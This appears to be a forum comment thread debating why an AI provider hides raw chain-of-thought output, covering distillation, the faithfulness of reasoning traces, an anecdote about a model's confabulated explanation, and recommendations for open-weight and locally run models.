Nope, not your agent, if you're not running it locally. You just get to use it in whatever way they allow (also see the whole OpenClaw backlash and claude -p changes), unless there'd be regulation and laws around this (which there aren't and would be lobbied against anyways).
> Getting the full thinking output requires an enterprise agreement.
If you truly need it, then that's a (costly) option. Seems like they're largely doing this to prevent other AI foundries from doing as much distillation and stealing their CoT output en masse.
Luckily more open models don't generally do that.
Edit: If you still need something decently capable in the cloud, I’d suggest GLM, DeepSeek, MiMo or Kimi or Minimax, maaaybe sometimes Mistral for a simple EU subscription. Or look at all the pay-per-token options on OpenRouter, though be mindful of quantization.
For running something locally Qwen 3.6 35B A3B is presently a decent starting point but it will be rather limited, either way you can look up the Unsloth quants on HuggingFace for something like llama.cpp or Ollama or LM Studio.
All will work with OpenCode and Kilo Code, and most other tools. Can also try with Claude Code, I made a tool for that too: https://ccode.kronis.dev/ (or just set the env variables and maybe some aliases for something close enough), but frankly OpenCode is nice nowadays.
Proprietary technology is fun /s
What a waste of time
Well yes exactly, because they have billions of investments riding on it and why would anyone semi-bankrupt their org paying API rates for Anthropic, if a hypothetical DeepSeek V5 Pro would have almost all of Opus capabilities at that point, due to immense distillation?
Will people keep paying a highly highly premium price for another 5% intelligence when you just loop 5 more times for much cheaper?
Their time would be better spend making a more competitive and more compelling tool instead of adding walls that are easy to jailbreak. There’s always another way around.
writes this^ and then proceeds to highlight a bold title from the docs that says "summarized thinking" that explains things clearly in the first sentence. lol
It’s much harder to understand _why_ a model chose a particular approach in Claude Code. Especially because Claude will happily give you hallucinated reasons if you ask in retrospect.
Recent anecdote:
I was reviewing a colleague’s PR and Opus 4.8 decided to write the new feature in a completely new module. It was unnecessarily complex. We had a hard time understanding why it chose that, and it told us that it was so we could eventually deploy it as a separate micro-service and test it independently. What?
Only after being more a lot more specific about the implementation and spending a lot more tokens, it flat out refused to simplify the code with the actual reason. It turns out a line recently added to CLAUDE.md was making it incorrectly think that the module it was originally supposed to modify was legacy code that it was forbidden to extend.
This would have been caught immediately if we could inspect its thinking process.
this is really really not that bad at all
1. make distillation much harder
2. safety: prevent modifications to the thinking leading to injection attacks.
3. also honestly sometimes the model raw thoughts can be deranged and is not a good user experience (consider the varied audience in the market, etc.)
also often the mass underestimate/the model makers over-estimate how people love distilling models
In further reflection it is such a great indignity & such a collosal barrier to working with the machine that it insists on being a black box. The disingenuity of the American models (small print: except AI2 & some other labs; you all are so great) is a massive disadvantage to their use,... and a massive slap in the face.
It's a threat to human intelligence that it is not co-participative. Walking further into my own judgement and feelings: the insistence on being an opaque black box, the Seals Chinese Room, is such a vicious harm to society! This is civilizationally an unsafe form of AI that probably should be outlawed as anti-social. It's an impermissible asymmetry, a crippling dependent relationship to be forced into. I'm working myself up, but here: this.. imo, this is not just indignity, is harmful, it is evil.
This "6 month behind" trend we've seen for open models feels like at some point will be less important than simply the models unwillingness to speak for itself & to be observable.
I suspect that in some decades, as other architectures are found and used, that the inability of an LLM to "think" without also emitting a token will be seen as one of their fundamental limitations.
Humans somewhat do the same - something that's been demonstrated in split-brain experiments.
Because of the nature of how LLMs work — text prediction engines - by putting the explicit reasoning steps first, it improves the likelihood of the final answer (which then is being predicted based on the entire reasoning chain as input) being correct.
This evades an easy yes or no, so:
1. Many consumers believe reasoning-models allow that kind of question to be truthfully-answered, and their belief it reasonable given the marketing going on.
2. Implementers probably do not have the same belief when it comes to the terms mean or what capabilities they imply.
3. Yes, it doesn't actually do what the customer wanted it to do, which is a kind of retrospective introspection of internal thoughts and ideas.
____________
I advocate looking at everything from a document-generation perspective to cut down on traps and cognitive illusions. The "reasoning" models are a change in the style of document being iteratively-grown by the LLM, as opposed to something more anthropomorphized.
* Default: There's just the spoken dialogue between a Human Customer and Helpful Chatbot.
* "Reasoning": There's the spoken dialogue and a bunch of times the Helpful Chatbot character has an internal monologue. This provides more consistency between iterations, and can be mined by custom tools to call external code and insert results.
If your Human Customer character ask "Why did you say that", the LLM does not engage in a different process than "I have eaten an apple."
The LLM has no memories to consult or hidden goals to contemplate, it's the same process of finding more stuff that fits at the end of the document. Any benefits from a "reasoning model" is the LLM generates much better-looking additions because there's more (hidden) stuff for it to confabulate against.
1. https://medium.com/@eshvargb/the-llm-journey-how-neural-netw...
Tell me this. If you hired a junior engineer or designer who refused to explain their thinking on their code and how they solved for the spec what would you do?
(That being said the reasoning output is still a summary of the Kvcache)
Any explanation that someone gives of their thinking process is necessarily lossy and likely partially confabulated.
If it's useful, it's useful, enjoy. If you aren't comfortable with that, don't use LLMs. You aren't going to get a mathematical proof of your output, just learn to be comfortable with that, or opt out and be a goat farmer.
No, they aren't a summary. They are the actual decoding of the sequence of tokens emitted during the the “thinking” stage of response generation.
Just as with, say, a human onner monolog in words vs actual speech, they are a product of the same output process as the non-thinking tokens. They aren’t a translation of the internal process that precedes the output mapped into language, either as a full result or a summary.
Having access to the reasoning text and output would help with performance measurement.
For daily use I actually like the reasoning summary to be brief/quick to scan.
That said, I understand the author’s desire for the real thing. It just feels better to have that access, especially when Anthropic will give it to you, but encrypted.
You cant even guarantee WHAT model you get. Or if they downgrade you. Or if you 'offend corporate sensibilities' and they misdirect or lie.
The only way to get good returns on a model is to run it yourself. Quit paying for corporate bullshit.
This could all be optics as well to try to give the appearance of a defensible moat. E.g. they can claim to investors that they are able to protect a significant chunk of their intellectual property this way. I'm not sure if anyone has a study about how significant the summarization is to distillation.
In the case of makers of open-source models (which are also competition), there is no allegedly, they were (and still are) openly doing that.
That distillation might be inferred from the behavior of commercial models is not the same as them openly doing it.
https://en.wikipedia.org/wiki/Economic_moat
It may also be that misaligned responses can be in CoT which OpenAI does not want to show to users.
In this case it stops people copying your IP
Being currently in the lead in a category is not a moat,a moat is whatever creates a barrier to competitors catching up when you are in the lead. Merely being in the lead is not a moat except in a market with strong network externalities.
> The computation we can see looks like it’s just guessing the answer, despite the chain of thought suggesting it’s computed it using a calculator.
It might be hallucinating or lying, it's not like you are actually observing the internals of the model.
Nor does knee jerk accusation of "anthropomorphizing" negate the fact that procedures that mimic human processing, even when done in software, are deservingly anthropomorphized, because they're a legitimate approximation of the human equivalent operations.
Computers don’t think they process, those are very different activities.